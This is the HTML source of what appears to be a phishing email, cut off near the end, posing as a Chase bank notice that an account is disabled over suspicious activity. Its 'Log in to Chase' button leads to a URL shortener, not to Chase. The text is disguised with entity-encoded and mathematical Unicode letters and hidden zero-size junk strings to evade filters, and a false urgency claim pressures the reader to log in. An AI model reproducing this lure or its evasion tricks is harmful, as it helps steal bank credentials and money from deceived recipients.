<!doctype html>
<html>
<head>
    <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
        <style>
            body {
                margin: 0;
            }
            h2, p, a {
                font-family: myriad-pro,Verdana,sans-serif !important;
                line-height: 1.5 !important;
            }
            hr {
                border: 2px solid #e6e6e6 !important;
            }
            @media only screen and (min-width: 280px){
                H2 {
                    font-size: 18px !important;
                    color: #003366 !important;
                }
            }
            @media only screen and (min-width: 500px){
                #main {
                    max-width: 711px !important;
                }
                h2 {
                    font-size: 20px !important;
                    color: #003366 !important;
                }
                p {
                    max-width: 711px !important;
                }
            }
        </style>
    <body>
        <table id="main" style="width:100%" cellspacing="0" cellpadding="20" border="0">
            <tr class="container" style="background-color:white">
                <td style="text-align:center;">
                    <img style="width:150px" src="https://github.com/mickeymouse251/mickeymouserepo/blob/29b33902ca5d43b826c9a7dd9bef3d10836971e6/194666d0-b9fb-4702-bacb-d5e58a19efad%20(1).png?raw=true">
                </td>
            </tr>
        </table>
        <table id="main" style="width:100%" cellspacing="0" cellpadding="0" border="0">
            <tr style="background-color:white">
                <td>
            <table id="main" style="width:100%" cellspacing="0" cellpadding="10" border="0">
            <tr>
                <td style="text-align:center">
                    <hr>
                  <h2>&#x41;&#x63;&#x63;&#x6f;&#x75;&#x6e;&#x74;&#x20;&#x56;&#x65;&#x72;&#x69;&#x66;&#x69;&#x63;&#x61;&#x74;&#x69;&#x6f;&#x6e;&#x20;&#x4e;&#x65;&#x65;&#x64;&#x65;&#x64;!</h2>  
                </td>
            </tr>
        </table>
        <table id="main" style="width:100%" cellspacing="0" cellpadding="20" border="0">
            <tr>
               <td  style="text-align:left">
             <p>Dear <b>&#x43;&#x68;&#x61;&#x73;&#x65;&#x20;&#x6d;&#x65;&#x6d;&#x62;&#x65;r,</b></p>
           <p> <span style="font-family: Arial; "><br>
    &#120248;&#120264;&#120270;&#120267; &#120252;&#120257;&#120250;&#120268;&#120254; &#120250;&#120252;&#120252;&#120264;&#120270;&#120263;&#120269; &#120257;&#120250;&#120268; &#120251;&#120254;&#120254;&#120263; &#120253;&#120258;&#120268;&#120250;&#120251;&#120261;&#120254;&#120253;.<font style="font-size: 0px;">CjNKIUS</font><span>&nbsp;</span>&#120246;&#120254; &#120257;&#120250;&#120271;&#120254; &#120255;&#120264;&#120270;&#120263;&#120253; &#120268;&#120270;&#120268;&#120265;&#120258;&#120252;&#120258;&#120264;&#120270;&#120268; &#120250;&#120252;&#120269;&#120258;&#120271;&#120258;&#120269;&#120274; &#120264;&#120263; &#120274;&#120264;&#120270;&#120267; &#120250;&#120252;&#120252;&#120264;&#120270;&#120263;&#120269;.<br>
            <font style="font-size: 0px;">1d6N1M5o</font><br>
            <font style="font-size: 0px;">MbNBoEgAg</font><span>&nbsp;</span>&#120224;&#120269; &#120269;&#120257;&#120258;&#120268; &#120269;&#120258;&#120262;&#120254;, &#120274;&#120264;&#120270; &#120272;&#120264;&#120263;'&#120269; &#120251;&#120254; &#120250;&#120251;&#120261;&#120254; &#120269;&#120264; :
            <ul>
              <li>T&#120267;&#120250;&#120263;&#120268;&#120255;&#120254;&#120267; M&#120264;&#120263;&#120254;&#120274;</li>
              <li>&#120246;&#120258;&#120269;&#120257;&#120253;&#120267;&#120250;&#120272; &#120229;&#120270;&#120263;&#120253;&#120268;</li>
            </ul>
&#120235;&#120264;&#120256;&#120258;&#120263; &#120269;&#120264; &#120274;&#120264;&#120270;&#120267; C&#120257;&#120250;&#120268;&#120254; &#120250;&#120252;&#120252;&#120264;&#120270;&#120263;&#120269; &#120250;&#120263;&#120253; &#120269;&#120250;&#120260;&#120254; &#120269;&#120257;&#120254; &#120268;&#120269;&#120254;&#120265;&#120268; &#120267;&#120254;&#120266;&#120270;&#120254;&#120268;&#120269;&#120254;&#120253;.</span><font style="font-size: 0px;">i91D61</font></td></p>
            <p></p>
                </td>
            </tr>
        </table>
        <table id="main" style="width:100%" cellspacing="0" cellpadding="20" border="0">
            <tr>
                <td style="text-align:center;">
                    <a href="https://l-ink.me/dWNf1" style="background:#10549d;padding:15px;text-decoration:none;font-size:18px;color:white;padding-left:25px;padding-right:25px;border-radius:5px;">&#120235;&#120264;&#120256; &#120258;&#120263; &#120269;&#120264; C&#120257;&#120250;&#120268;&#120254;</a>
                </td>
            </tr>
        </table>
        <table id="main" style="width:100%" cellspacing="0" cellpadding="20" border="0">
            <tr>
                <td>
                    <p>&#120242;&#120258;&#120263;&#120252;&#120254;&#120267;&#120254;&#120261;&#120274;,<br>
                    C&#120257;&#120250;&#120268;&#120254; &#120242;&#120270;&#120265;&#120265;&#120264;&#120267;&#120269;
                    </p>
                </td>
            </tr>
        </table>
             <table id="main" style="width:100%" cellspacing="10" cellpadding="0" border="0">
         <tr>
             <td>
        